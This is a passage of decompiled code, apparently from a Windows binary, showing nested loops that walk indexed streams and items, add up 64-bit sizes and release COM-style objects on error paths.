																								_t1181 =  *(_t1547 + _t1769 * 8);
																								 *(_t1785 - 0x124) = _t1181;
																								_t1548 =  *(_t1547 + 4 + _t1769 * 8);
																								__eflags = _t1181 | _t1548;
																								 *(_t1785 - 0x120) = _t1548;
																								if((_t1181 | _t1548) == 0) {
																									 *(_t1785 - 0x106) =  *(_t1785 - 0x106) & 0x00000000;
																									_t738 = _t1785 - 0x108;
																									 *_t738 =  *(_t1785 - 0x108) & 0x00000000;
																									__eflags =  *_t738;
																								} else {
																									 *(_t1785 - 0x18) =  *(_t1785 - 0x18) + 1;
																									 *(_t1785 - 0x106) = 1;
																									 *(_t1785 - 0x108) = 1;
																								}
																								_push(_t1785 - 0x2f4);
																								_push(_t1785 - 0x124);
																								E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																							}
																							 *(_t1785 - 4) = 0x22;
																							E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																							 *(_t1785 - 0x38) =  *(_t1785 - 0x38) + 4;
																							_t1769 = _t1769 + 1;
																							__eflags = _t1769 -  *(_t1785 + 0x14);
																							if(__eflags < 0) {
																								continue;
																							} else {
																								goto L221;
																							}
																						}
																						E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																						 *(_t1785 - 4) = 0x21;
																						E0042B864(_t1785 - 0x3a4, __eflags);
																						_t1165 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1165;
																						if(_t1165 != 0) {
																							 *((intOrPtr*)( *_t1165 + 8))(_t1165);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x25;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						E0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 = 0x80004005;
																					}
																					goto L286;
																				}
																				L198:
																				 *(_t1785 + 0x14) = 1;
																				goto L199;
																			}
																		}
																		_t590 = _t1785 + 0x14;
																		 *_t590 =  *(_t1785 + 0x14) & 0x00000000;
																		__eflags =  *_t590;
																		 *(_t1785 - 0x18) = _t1763;
																		do {
																			E00415C6D(_t1785 - 0xfc,  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1785 - 0x12c)) + 4)));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 0x14;
																			_t600 = _t1785 - 0x18;
																			 *_t600 =  *(_t1785 - 0x18) - 1;
																			__eflags =  *_t600;
																		} while ( *_t600 != 0);
																		goto L179;
																	} else {
																		goto L174;
																	}
																	do {
																		L174:
																		_push( *(_t1785 - 0x9c));
																		_t1206 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)) + 0xc)) +  *(_t1785 - 0x10) * 4);
																		_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1206 * 4)));
																		_push(_t1206);
																		_t1207 = E00432D91(_t1785 - 0x3b8);
																		_t1790 = _t1788 - 0x14;
																		_t1573 = 5;
																		memcpy(_t1790, _t1207, _t1573 << 2);
																		_t1788 = _t1790 + 0xc;
																		E00433730(_t1785 - 0x138);
																		 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																		__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																	} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x20));
																	_t1746 =  *(_t1785 - 0x68);
																	_t1763 =  *(_t1785 - 0x20);
																	goto L176;
																}
																__eflags =  *(_t1785 - 0x70) - 1;
																if( *(_t1785 - 0x70) <= 1) {
																	_t561 = _t1785 - 0x9c;
																	 *_t561 =  *(_t1785 - 0x9c) & 0x00000000;
																	__eflags =  *_t561;
																	goto L173;
																}
																goto L171;
															} else {
																_t1212 = _t1062 + _t1062 * 2 << 2;
																 *(_t1785 - 0x1c) = _t1212;
																while(1) {
																	_t1213 = _t1212 +  *((intOrPtr*)(_t1785 - 0xa8));
																	 *(_t1785 - 0x38) = _t1213;
																	__eflags =  *((intOrPtr*)(_t1213 + 4)) -  *(_t1785 - 0x2c);
																	if( *((intOrPtr*)(_t1213 + 4)) !=  *(_t1785 - 0x2c)) {
																		goto L168;
																	}
																	_t1577 =  *(_t1785 - 0x38);
																	_t1733 =  *((intOrPtr*)(_t1445 + 0x5c));
																	_t1215 =  *_t1577;
																	_t1774 =  *_t1577 << 2;
																	__eflags = _t1577[2] -  *((intOrPtr*)(_t1774 + _t1733));
																	if(_t1577[2] !=  *((intOrPtr*)(_t1774 + _t1733))) {
																		E004329C5(_t1785 - 0x1d4);
																		 *(_t1785 - 4) = 0x11;
																		_t1217 = E0040F595(_t1785 - 0x1d4);
																		__eflags = _t1217;
																		 *(_t1785 + 0x14) = _t1217;
																		if(_t1217 != 0) {
																			 *(_t1785 - 4) = 0xf;
																			E00423D3B(_t1785 - 0x1d4);
																			 *(_t1785 - 4) = 0xe;
																			E00428A47(_t1785 - 0x4cc);
																			 *(_t1785 - 4) = 5;
																			E00428510(_t1785 - 0x1b4, __eflags);
																			 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																			 *(_t1785 - 4) = 0x12;
																			E0040862D();
																			 *(_t1785 - 4) = 4;
																			E00408604(_t1785 - 0x4c);
																			 *(_t1785 - 4) = 3;
																			E0043353F(_t1785 - 0x2cc, __eflags);
																			__eflags = _t1746;
																			 *(_t1785 - 4) = 1;
																			if(_t1746 != 0) {
																				 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																			}
																			_t1765 =  *(_t1785 + 0x14);
																			goto L285;
																		}
																		 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & _t1217;
																		 *(_t1785 - 0x64) =  *(_t1785 - 0x64) & _t1217;
																		_push(_t1785 + 0x20);
																		_push(_t1785 - 0x64);
																		 *(_t1785 - 4) = 0x14;
																		E0040F5DB(_t1785 - 0x1d4);
																		E00404AD0(_t1785 - 0xe8, 1);
																		 *((intOrPtr*)(_t1785 - 0xe8)) = 0x47ab08;
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																		 *(_t1785 - 4) = 0x15;
																		_t1589 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																		__eflags = _t1589;
																		_t1232 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																		 *(_t1785 - 0x18) = _t1589;
																		if(_t1589 <= 0) {
																			L146:
																			_t1235 = E00430EFB( *((intOrPtr*)(_t1785 - 0x2b0)), _t1785, _t1445,  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774), _t1785 - 0xe8,  *(_t1785 + 0x20));
																			__eflags = _t1235;
																			 *(_t1785 + 0x14) = _t1235;
																			if(_t1235 != 0) {
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1237 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1237;
																				if(_t1237 != 0) {
																					 *((intOrPtr*)( *_t1237 + 8))(_t1237);
																				}
																				_t1238 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1238;
																				if(_t1238 != 0) {
																					 *((intOrPtr*)( *_t1238 + 8))(_t1238);
																				}
																				 *(_t1785 - 4) = 0xf;
																				E00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x16;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				E0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 + 0x14);
																				goto L285;
																			}
																			_t1249 =  *(_t1785 + 0x20);
																			__eflags = _t1249;
																			if(_t1249 != 0) {
																				 *((intOrPtr*)( *_t1249 + 8))(_t1249);
																				_t420 = _t1785 + 0x20;
																				 *_t420 =  *(_t1785 + 0x20) & 0x00000000;
																				__eflags =  *_t420;
																			}
																			E0040C9B4(_t1785 - 0x2b4,  *((intOrPtr*)(_t1785 - 0x98)));
																			_t1601 =  *((intOrPtr*)(_t1445 + 0x17c));
																			 *(_t1785 - 0x298) =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																			_t1254 =  *((intOrPtr*)(_t1445 + 0x190)) + _t1774;
																			 *(_t1785 + 0x14) = _t1254;
																			_t1255 =  *_t1254;
																			_t1730 =  *((intOrPtr*)(_t1601 + _t1255 * 8)) +  *((intOrPtr*)(_t1445 + 0x148));
																			asm("adc eax, [ebx+0x14c]");
																			 *(_t1785 - 0x2a4) = _t1730;
																			 *((intOrPtr*)(_t1785 - 0x2a0)) =  *((intOrPtr*)(_t1601 + 4 + _t1255 * 8));
																			 *((intOrPtr*)(_t1785 - 0x29c)) =  *((intOrPtr*)(_t1445 + 0xc)) +  *( *(_t1785 + 0x14)) * 8;
																			E0040FBD7(_t1785 - 0x2cc);
																			 *(_t1785 + 0x14) =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																			E0042DB56(_t1785 - 0x34c);
																			_push(_t1746);
																			_push( *((intOrPtr*)(_t1785 + 0x10)));
																			 *(_t1785 - 4) = 0x17;
																			_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																			_push(_t1785 - 0x34c);
																			_push(_t1785 - 0x34);
																			_push(0);
																			_push( *(_t1785 - 0x64));
																			_t1268 = E004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																			__eflags = _t1268;
																			 *(_t1785 - 0x18) = _t1268;
																			if(__eflags != 0) {
																				 *(_t1785 - 4) = 0x15;
																				E0042B864(_t1785 - 0x34c, __eflags);
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1271 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1271;
																				if(_t1271 != 0) {
																					 *((intOrPtr*)( *_t1271 + 8))(_t1271);
																				}
																				_t1272 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1272;
																				if(_t1272 != 0) {
																					 *((intOrPtr*)( *_t1272 + 8))(_t1272);
																				}
																				 *(_t1785 - 4) = 0xf;
																				E00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x18;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				E0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 - 0x18);
																				goto L285;
																			} else {
																				E00467AC0( *((intOrPtr*)(_t1785 - 0x2c4)));
																				__eflags =  *(_t1785 - 0x2b8);
																				if(__eflags != 0) {
																					_t1765 =  *(_t1785 - 0x2b8);
																					 *(_t1785 - 4) = 0x15;
																					E0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1286 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1286;
																					if(_t1286 != 0) {
																						 *((intOrPtr*)( *_t1286 + 8))(_t1286);
																					}
																					_t1287 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1287;
																					if(_t1287 != 0) {
																						 *((intOrPtr*)( *_t1287 + 8))(_t1287);
																					}
																					 *(_t1785 - 4) = 0xf;
																					E00423D3B(_t1785 - 0x1d4);
																					 *(_t1785 - 4) = 0xe;
																					E00428A47(_t1785 - 0x4cc);
																					 *(_t1785 - 4) = 5;
																					E00428510(_t1785 - 0x1b4, __eflags);
																					 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																					 *(_t1785 - 4) = 0x19;
																					E0040862D();
																					 *(_t1785 - 4) = 4;
																					E00408604(_t1785 - 0x4c);
																					goto L255;
																				}
																				_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																				_t1298 =  *(_t1785 + 0x14);
																				__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				if(_t1298 >=  *((intOrPtr*)(_t1627 + 8))) {
																					L154:
																					 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x34c);
																					_push(_t1785 - 0x34c);
																					_t1301 =  *((intOrPtr*)(_t1785 + 0x10));
																					asm("adc [edi+0x24], edx");
																					_t478 = _t1301 + 0x3c; // 0x3c
																					E0042F063(_t478);
																					 *(_t1785 - 4) = 0x15;
																					E0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1305 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1305;
																					if(_t1305 != 0) {
																						 *((intOrPtr*)( *_t1305 + 8))(_t1305);
																					}
																					_t1306 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1306;
																					if(_t1306 != 0) {
																						 *((intOrPtr*)( *_t1306 + 8))(_t1306);
																					}
																					 *(_t1785 - 4) = 0xf;
																					E00423D3B(_t1785 - 0x1d4);
																					L159:
																					_t494 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																					E00415C6D(_t494,  *((intOrPtr*)( *(_t1785 - 0x38) + 8)));
																					 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																					_t1312 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																					_t1775 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																					__eflags = _t1312;
																					 *(_t1785 - 0x38) = _t1312;
																					if(_t1312 <= 0) {
																						L167:
																						 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
																						 *(_t1785 - 0x1c) =  *(_t1785 - 0x1c) + 0xc;
																						__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
																						if( *(_t1785 - 0x24) <  *(_t1785 - 0xac)) {
																							_t1212 =  *(_t1785 - 0x1c);
																							continue;
																						}
																						goto L168;
																					} else {
																						goto L160;
																					}
																					do {
																						L160:
																						E0042EAC2(_t1785 - 0x178);
																						 *(_t1785 - 4) = 0x1a;
																						E004308F5(_t1445, _t1775, _t1785 - 0x178, _t1785 - 0x1fc);
																						__eflags =  *((char*)(_t1785 - 0x15c));
																						if( *((char*)(_t1785 - 0x15c)) != 0) {
																							 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																							_t1321 =  *( *((intOrPtr*)(_t1785 - 0xc8)) + _t1775 * 4);
																							__eflags = _t1321;
																							if(_t1321 >= 0) {
																								_t1322 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1321 * 4);
																								 *(_t1785 - 0x18) = _t1322;
																								__eflags =  *((char*)(_t1322 + 0x38));
																								if( *((char*)(_t1322 + 0x38)) == 0) {
																									__eflags =  *((char*)(_t1322 + 0x39));
																									if( *((char*)(_t1322 + 0x39)) != 0) {
																										E0042EAC2(_t1785 - 0x158);
																										_push(_t1785 - 0x1fc);
																										_t1730 = _t1785 - 0x158;
																										 *(_t1785 - 4) = 0x1b;
																										E0043327A( *(_t1785 - 0x18), _t1730);
																										 *(_t1785 - 0x158) =  *((intOrPtr*)(_t1785 - 0x178));
																										 *((intOrPtr*)(_t1785 - 0x154)) =  *((intOrPtr*)(_t1785 - 0x174));
																										 *((intOrPtr*)(_t1785 - 0x14c)) =  *((intOrPtr*)(_t1785 - 0x16c));
																										 *((char*)(_t1785 - 0x13a)) =  *((intOrPtr*)(_t1785 - 0x15a));
																										 *((char*)(_t1785 - 0x13c)) =  *((intOrPtr*)(_t1785 - 0x15c));
																										E00430A06(_t1785 - 0x178, _t1785 - 0x158);
																										 *(_t1785 - 4) = 0x1a;
																										E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																									}
																									_push(_t1785 - 0x1fc);
																									_push(_t1785 - 0x178);
																									E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																								}
																							}
																						}
																						 *(_t1785 - 4) = 0xf;
																						E00407A18( *((intOrPtr*)(_t1785 - 0x168)));
																						_t1775 = _t1775 + 1;
																						__eflags =  *(_t1785 + 0x14) -  *(_t1785 - 0x38);
																					} while ( *(_t1785 + 0x14) <  *(_t1785 - 0x38));
																					goto L167;
																				} else {
																					goto L152;
																				}
																				do {
																					L152:
																					_t1730 =  *( *((intOrPtr*)(_t1627 + 0xc)) + _t1298 * 8);
																					 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																					asm("adc [edi+0x2c], ecx");
																					_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																					_t1298 = _t1298 + 1;
																					__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				} while (_t1298 <  *((intOrPtr*)(_t1627 + 8)));
																				 *(_t1785 + 0x14) = _t1298;
																				goto L154;
																			}
																		}
																		_t1340 = _t1232 << 2;
																		 *(_t1785 + 0x14) = _t1340;
																		while(1) {
																			 *(_t1785 - 0x5c) =  *(_t1785 - 0x5c) & 0x00000000;
																			_t1651 =  *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1340));
																			__eflags =  *((char*)(_t1651 + 0x1c));
																			if( *((char*)(_t1651 + 0x1c)) != 0) {
																				 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																				_t1343 =  *(_t1340 +  *((intOrPtr*)(_t1785 - 0xc8)));
																				__eflags = _t1343;
																				if(_t1343 >= 0) {
																					_t1344 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1343 * 4));
																					__eflags =  *((char*)(_t1344 + 0x38));
																					if( *((char*)(_t1344 + 0x38)) == 0) {
																						 *(_t1785 - 0x5c) = 1;
																					}
																				}
																			}
																			E0043AC2F(_t1785 - 0xe8,  *(_t1785 - 0x5c));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 4;
																			__eflags =  *(_t1785 - 0x20) -  *(_t1785 - 0x18);
																			if( *(_t1785 - 0x20) >=  *(_t1785 - 0x18)) {
																				goto L146;
																			}
																			_t1340 =  *(_t1785 + 0x14);
																		}
																		goto L146;
																	}
																	_t1345 = E00429872(_t1445, _t1215);
																	_t1657 =  *((intOrPtr*)(_t1445 + 0x17c));
																	 *((intOrPtr*)(_t1785 - 0x104)) = _t1345;
																	_push(_t1746);
																	_push(_t1733);
																	_push(_t1345);
																	 *((intOrPtr*)(_t1785 - 0x100)) = _t1733;
																	_t1347 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	asm("adc eax, [ebx+0x14c]");
																	_push( *((intOrPtr*)(_t1657 + 4 + _t1347 * 8)));
																	_push( *((intOrPtr*)(_t1657 + _t1347 * 8)) +  *((intOrPtr*)(_t1445 + 0x148)));
																	_t1730 =  *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50);
																	_t1350 = E00432A5E( *((intOrPtr*)(_t1785 - 0x98)), _t1730);
																	__eflags = _t1350;
																	 *(_t1785 + 0x14) = _t1350;
																	if(_t1350 != 0) {
																		 *(_t1785 - 4) = 0xe;
																		E00428A47(_t1785 - 0x4cc);
																		 *(_t1785 - 4) = 5;
																		E00428510(_t1785 - 0x1b4, __eflags);
																		 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																		 *(_t1785 - 4) = 0x10;
																		E0040862D();
																		 *(_t1785 - 4) = 4;
																		E00408604(_t1785 - 0x4c);
																		 *(_t1785 - 4) = 3;
																		E0043353F(_t1785 - 0x2cc, __eflags);
																		__eflags = _t1746;
																		 *(_t1785 - 4) = 1;
																		if(_t1746 != 0) {
																			 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																		}
																		 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																		E00408604(_t1785 - 0xb4);
																		 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																		E00408604(_t1785 - 0xd4);
																		_t1076 =  *(_t1785 + 0x14);
																		goto L286;
																	}
																	 *((intOrPtr*)(_t1746 + 0x18)) =  *((intOrPtr*)(_t1746 + 0x18)) +  *((intOrPtr*)(_t1785 - 0x104));
																	asm("adc [edi+0x1c], eax");
																	 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																	_t1363 =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																	_t1667 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	 *(_t1785 - 0x18) = _t1363;
																	__eflags =  *(_t1363 + 0x30);
																	if( *(_t1363 + 0x30) <= 0) {
																		L136:
																		_t1364 =  *((intOrPtr*)(_t1785 + 0x10));
																		_push( *(_t1785 - 0x18));
																		_t366 = _t1364 + 0x3c; // 0x3c
																		E0042F063(_t366);
																		goto L159;
																	}
																	_t1367 = _t1667 << 3;
																	__eflags = _t1367;
																	 *(_t1785 + 0x14) = _t1367;
																	do {
																		E0042389F( *((intOrPtr*)(_t1785 + 0x10)),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)))),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)) + 4)));
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																		_t1371 =  *(_t1785 - 0x18);
																		 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 8;
																		__eflags =  *(_t1785 - 0x20) -  *((intOrPtr*)(_t1371 + 0x30));
																	} while ( *(_t1785 - 0x20) <  *((intOrPtr*)(_t1371 + 0x30)));
																	goto L136;
																}
																goto L168;
															}
															L225:
															 *(_t1785 - 4) = 0xe;
															E00428A47(_t1785 - 0x4cc);
															 *(_t1785 - 4) = 5;
															E00428510(_t1785 - 0x1b4, __eflags);
															 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
															__eflags =  *(_t1785 - 0x2c) - 4;
														} while ( *(_t1785 - 0x2c) < 4);
														__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
														if( *(_t1785 - 0x24) ==  *(_t1785 - 0xac)) {
															 *(_t1785 - 0x7c) = 4;
															 *((intOrPtr*)(_t1785 - 0x88)) = 0;
															 *(_t1785 - 0x84) = 0;
															 *((intOrPtr*)(_t1785 - 0x80)) = 0;
															 *((intOrPtr*)(_t1785 - 0x8c)) = 0x47a668;
															_t1764 =  *((intOrPtr*)(_t1785 + 8));
															 *(_t1785 - 4) = 0x27;
															 *(_t1785 - 0x10) = 0;
															__eflags =  *(_t1764 + 8);
															if( *(_t1764 + 8) <= 0) {
																L277:
																E00419600(_t1785 - 0x8c, _t1730, E00432D40, _t1764);
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																__eflags =  *(_t1785 - 0x84);
																if( *(_t1785 - 0x84) <= 0) {
																	L282:
																	 *(_t1785 - 4) = 5;
																	E00408604(_t1785 - 0x8c);
																	E004329D2( *((intOrPtr*)(_t1785 + 0x10)));
																	 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																	 *(_t1785 - 4) = 0x29;
																	E0040862D();
																	 *(_t1785 - 4) = 4;
																	E00408604(_t1785 - 0x4c);
																	 *(_t1785 - 4) = 3;
																	E0043353F(_t1785 - 0x2cc, __eflags);
																	__eflags = _t1746;
																	 *(_t1785 - 4) = 1;
																	if(_t1746 != 0) {
																		 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																	}
																	_t1765 = 0;
																	__eflags = 0;
																	goto L285;
																} else {
																	goto L278;
																}
																do {
																	L278:
																	_t1767 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0x80)) +  *(_t1785 - 0x10) * 4) * 4));
																	E0042EAC2(_t1785 - 0x158);
																	__eflags =  *((char*)(_t1767 + 0x39));
																	 *(_t1785 - 4) = 0x28;
																	_push(_t1785 - 0x1fc);
																	if( *((char*)(_t1767 + 0x39)) == 0) {
																		_push(_t1785 - 0x158);
																		_push( *_t1767);
																		E004308F5(_t1445);
																	} else {
																		E0043327A(_t1767, _t1785 - 0x158);
																	}
																	_push(_t1785 - 0x1fc);
																	_push(_t1785 - 0x158);
																	E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																	 *(_t1785 - 4) = 0x27;
																	E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																	__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x84);
																} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x84));
																goto L282;
															} else {
																goto L268;
															}
															do {
																L268:
																_t1092 =  *( *((intOrPtr*)(_t1764 + 0xc)) +  *(_t1785 - 0x10) * 4);
																__eflags = _t1092[0xe];
																if(_t1092[0xe] == 0) {
																	_t1093 =  *_t1092;
																	__eflags = _t1093 - 0xffffffff;
																	if(_t1093 == 0xffffffff) {
																		L275:
																		E00415C6D(_t1785 - 0x8c,  *(_t1785 - 0x10));
																		goto L276;
																	}
																	__eflags =  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1093 * 4)) + 0x1c));
																	L274:
																	if(__eflags != 0) {
																		goto L276;
																	}
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(_t1092[0xe] != 0) {
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(__eflags != 0) {
																	goto L275;
																}
																goto L274;
																L276:
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																__eflags =  *(_t1785 - 0x10) -  *(_t1764 + 8);
															} while ( *(_t1785 - 0x10) <  *(_t1764 + 8));
															goto L277;
														}
														 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
														 *(_t1785 - 4) = 0x26;
														E0040862D();
														 *(_t1785 - 4) = 4;
														E00408604(_t1785 - 0x4c);
														 *(_t1785 - 4) = 3;
														E0043353F(_t1785 - 0x2cc, __eflags);
														__eflags = _t1746;
														 *(_t1785 - 4) = 1;
														if(_t1746 != 0) {
															 *((intOrPtr*)( *_t1746 + 8))(_t1746);
														}
														_t1765 = 0x80004005;
														goto L285;
													}
													 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
													 *(_t1785 - 4) = 0xd;
													E0040862D();
													 *(_t1785 - 4) = 4;
													E00408604(_t1785 - 0x4c);
													 *(_t1785 - 4) = 3;
													E0043353F(_t1785 - 0x2cc, __eflags);
													__eflags = _t1746;
													 *(_t1785 - 4) = 1;
													if(_t1746 != 0) {
														 *((intOrPtr*)( *_t1746 + 8))(_t1746);
													}
													_t1765 =  *(_t1785 + 0x14);
													goto L285;
												}
												 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
												 *(_t1785 - 4) = 0xc;
												E0040862D();
												 *(_t1785 - 4) = 4;
												E00408604(_t1785 - 0x4c);
												 *(_t1785 - 4) = 3;
												E0043353F(_t1785 - 0x2cc, __eflags);
												__eflags = _t1746;
												 *(_t1785 - 4) = 1;
												if(_t1746 != 0) {
													 *((intOrPtr*)( *_t1746 + 8))(_t1746);
												}
												_t1765 =  *(_t1785 + 0x14);
												goto L285;
											}
											_push(0x14);
											_t1776 = E004079F2();
											 *(_t1785 - 0x5c) = _t1776;
											__eflags = _t1776;
											 *(_t1785 - 4) = 8;
											if(_t1776 == 0) {
												_t1776 = 0;
												__eflags = 0;
											} else {
												 *_t1776 = 0x47a78c;
												 *(_t1776 + 4) =  *(_t1776 + 4) & 0x00000000;
												_t221 = _t1776 + 8; // 0x8
												E0040351A(_t221);
												 *_t1776 = 0x47b404;
											}
											 *(_t1785 - 4) = 5;
											 *(_t1785 - 0xa0) = _t1776;
											E0040C9B4(_t1785 - 0x294, _t1776);
											_t1391 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c))));
											__eflags =  *((char*)(_t1391 + 0x2c));
											if( *((char*)(_t1391 + 0x2c)) == 0) {
												_t1392 =  *(_t1785 + 0x20);
												__eflags = _t1392;
												if(_t1392 != 0) {
